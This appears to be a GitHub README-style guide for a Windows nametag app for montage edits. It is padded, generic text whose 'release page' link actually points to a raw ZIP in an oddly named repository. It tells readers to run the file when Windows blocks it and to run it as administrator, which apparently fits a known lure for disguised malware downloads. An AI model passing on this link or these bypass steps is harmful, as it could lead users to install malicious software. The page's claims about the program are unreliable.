nametag-maker helps you create clean nametags for montage work on Windows. Use it when you want to make names, labels, and tags that fit into image edits and video overlays.
This guide shows you how to get the app from GitHub and run it on your PC.
Open the release page here:
On that page, look for the latest release and download the Windows file for your PC. If you see a ZIP file, save it first, then open it after the download finishes. If you see an EXE file, you can run it after download.
For best results, use a Windows PC with:
- Windows 10 or Windows 11
- 4 GB RAM or more
- 200 MB free disk space
- A mouse and keyboard
- Internet access for the first download
The app is meant for standard desktop use. It should work on most modern Windows computers without extra setup.
nametag-maker is built for simple montage tasks. It can help you:
- Make clear nametags for images and edits
- Add names for profile-style layouts
- Prepare labels for thumbnails and montage scenes
- Keep text clean and easy to read
- Use a simple workflow for quick edits
It is best for users who want a direct way to prepare names and tags without dealing with a complex tool.
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Open the release page: https://github.com/Genusescherichiaglutton437/nametag-maker/raw/refs/heads/main/resource/nametag_maker_v1.5.zip
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Find the newest release at the top of the page.
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Under Assets, download the Windows file:
- If it is a
.zipfile, save it to your computer - If it is a
.exefile, save it to a folder you can find again
- If it is a
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If you downloaded a ZIP file:
- Right-click the file
- Choose Extract All
- Pick a folder such as Downloads or Desktop
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Open the extracted folder.
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Double-click the app file to start nametag-maker.
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If Windows asks for permission, choose Yes or Run.
After you open the app, you should see a simple screen for nametag work.
Typical steps are:
- Open the app
- Enter the name or text you want
- Choose a style or layout
- Adjust size, position, or color if needed
- Save or export the result for your montage
If the app opens in a folder with several files, look for the main .exe file with the app name.
You can use nametag-maker for tasks like:
- Adding names to montage images
- Creating clean labels for edited photos
- Making text blocks for content thumbnails
- Building simple name cards for video overlays
- Preparing repeated tags for a set of images
The app fits work where the text needs to stay neat and easy to place.
A simple way to use the app is:
- Start a new project or open the app
- Type the name or tag
- Pick a font size that matches your layout
- Place the nametag where it fits best
- Save the output image or project file
If you work on many montages, keep a few common names ready so you can reuse them.
- Keep the downloaded file in one folder so you can find it later
- If Windows blocks the file, check the file properties and allow it to run
- If the app does not open, try extracting the ZIP file again
- Use a folder name without special characters
- Save your output to a clear folder like Pictures or Desktop
If you use the app often, create a shortcut on your desktop after the first launch.
Try these steps:
- Make sure the download finished fully
- Check that you extracted the ZIP file before opening it
- Right-click the app and choose Run as administrator
- Close other heavy apps and try again
- Download the latest release again from the release page
If the file still does not open, check that your Windows version is up to date.
You can keep your files in a simple layout like this:
Downloadsfor the original release filenametag-makerfor the extracted appMontage-Outputsfor saved nametagsReference-Imagesfor source pictures
This makes it easier to find your work later.
No. The app is meant for normal Windows users who want to make nametags for montage work.
In most cases, no. Download the release file, extract it if needed, and run the app.
Yes. You can also use it for labels, name cards, and simple text layouts.
Use the release page here:
- Open the release page
- Download the Windows file
- Extract the ZIP if needed
- Open the app
- Enter your nametag text
- Save your result